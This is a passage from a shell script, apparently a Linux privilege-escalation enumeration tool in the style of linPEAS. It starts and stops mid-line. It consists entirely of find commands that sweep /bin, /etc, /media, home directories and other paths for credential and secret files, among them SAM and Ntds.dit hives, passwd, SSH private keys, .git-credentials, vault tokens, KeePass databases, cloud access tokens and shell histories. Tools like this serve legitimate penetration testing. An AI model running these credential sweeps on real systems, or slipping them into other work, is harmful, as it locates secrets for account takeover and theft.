\"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name 
\"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o 
-name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o 
-name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name 
\"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o 
-name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" 
-o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name 
\"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o 
-name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o 
-name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"*knockd*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name 
\"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"ssh*config\" -o -name \"config.php\" -o -name \"*.kdbx\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"google-chrome\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name 
\"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name 
\"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name 